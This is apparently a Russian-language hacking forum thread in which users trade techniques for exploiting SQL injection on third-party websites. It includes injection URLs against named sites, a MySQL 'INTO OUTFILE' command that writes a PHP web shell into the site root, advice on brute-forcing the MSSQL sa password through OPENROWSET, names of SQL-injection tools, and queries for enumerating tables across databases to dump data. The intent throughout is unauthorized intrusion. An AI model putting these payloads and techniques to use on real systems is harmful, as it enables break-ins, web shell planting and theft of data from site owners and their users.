Не будет работать, ибо глобальные массивы будут регистрироваться вначале скрипта, а после будет идти инклюд конфига какого-то, и $template заменится. jokester, спасибо. Это мой код, т.е. исходников я палить не хотел, ибо там названия классов / ф-ция выдает двиг. В исходнике движка есть еще префикс dirname(__FILE__), т.е. папка тек. файла. Значит никак Спасибо еще раз... Значит можно добиться только расскрытия...
С первым то все понятно, работает как часы А вот этот скрипт он именно такой короткий и есть PHP: $template->set_filenames(array('head'=>"$template_path/header.html")); Просто он написан для того чтобы его инклудить в файл в котором класс template задан уже, но по глупости авторов к этому скрипту есть прямой доступ.
Есть сервер MySQL И сервер на котором стоит сайт, он может выводить/вводить данные из/в БД 1)Как можно на сервер с сайтом залить шелл через MySQL 2)Может можно прописать что-то в БД чтоб сайт вывел шелл читая это из БД PS заливки файлов нет на сайте
Если file_priv = Y и есть путь к корню, то Code: SELECT '<?php echo "shellcode"; ?>' FROM table_name INTO OUTFILE '/full/path/to/dir/shell.php'
у меня следующий вопрос. Есть скуля, версия БД =4. Там нет informatio_shcema. Следовательно поиск имен таблиц и т.д. превращается в полный геморр(лично для меня это так)). Можно ли автоматизировать этот процесс? Кроме использования сипта?
Единственное что я думаю можно сделать в моём случае 1)ЧТоб сайт прочитал из БД шелл и заинклудил его к себе 2)Чтоб сайт отрыл шелл который находится на сервере с MySQL
На сайте, при вводе символа ' в строку с логеном, выскакевает следующее сообщение: Стандартные пути раскрутки - не приводят ни к чиму. Как быть? Строка урла при это выглядет так: saita.net/login.php?action=process&osCsid=8951e68c4h7e10jg70cdgghqc3 кто падскажет?
Набрёл тут на недописанную страничку на одном сайте, но никак немогу раскрутить ничего кроме версии... что можно ещё сделать? Code: http://www.forema.ru/test.php?id=26+and+substring(version(),1,1)=5
Заюзал скулю. Движок самописный, админку не нашел. Прав на исполнение команд не хватает. Вручную перебирать все через top 1 - ну очень долго и геморно, поэтому имею пару вопрос. 1. Друзья, что можно сделать с mssql скулей, пользователь не sa. Может ли хватить прав для заливки файла в директорию или сайта или на это тоже не хватит прав(простите, не знаю...) 2. Подскажите нормальный дампер через скул для mssql, все что нашел - либо удалено, либо бито... Когда перебирал базы(select db_name(n)) наткнулся на очень вкусные вещи, но когда пытался получить название их колонок, меня просто перекидало на изначальную страницу(дефолтную, где заюзал скул), а скуля просто отображалась в строке поиска. Может ли это говорить о том, что не хватает прав? Просто у меня возникла такая идея: Если у моего пользователя хватит прав, то можно посмотреть и эту таблицу, но, из-за того что текущая база данных другая, то через INFORMATION_SCHEMA подобрать таблицы и поля - не удастся. Прав или натупил? 3. Можно ли попробовать подключиться к этой базе используя запрос вида(приблизительно) Или в ms sql с эти строго и ничего не получится? Если возможно, но запрос другой - подкорректируйте пожалуйста, я только учусь)))
Добиться повышения привилегий с использованием брута пароля sa через OPENROWSET (в MSSQL 2005 отключено по умолчанию). В этом поможет инструмент sqlninja. Pangolin, PRIAMOS, SFX-SQLi возможно ты использовал неправильный синтаксис при указании базы данных, должно быть: SELECT * FROM [db]..[table] Можно получить названия таблиц из других баз данных, используя оператор USE для их выбора (если конечно прав хватит): ;USE db; SELECT name FROM sysobjects WHERE xtype = 'U'; ;USE db; SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')
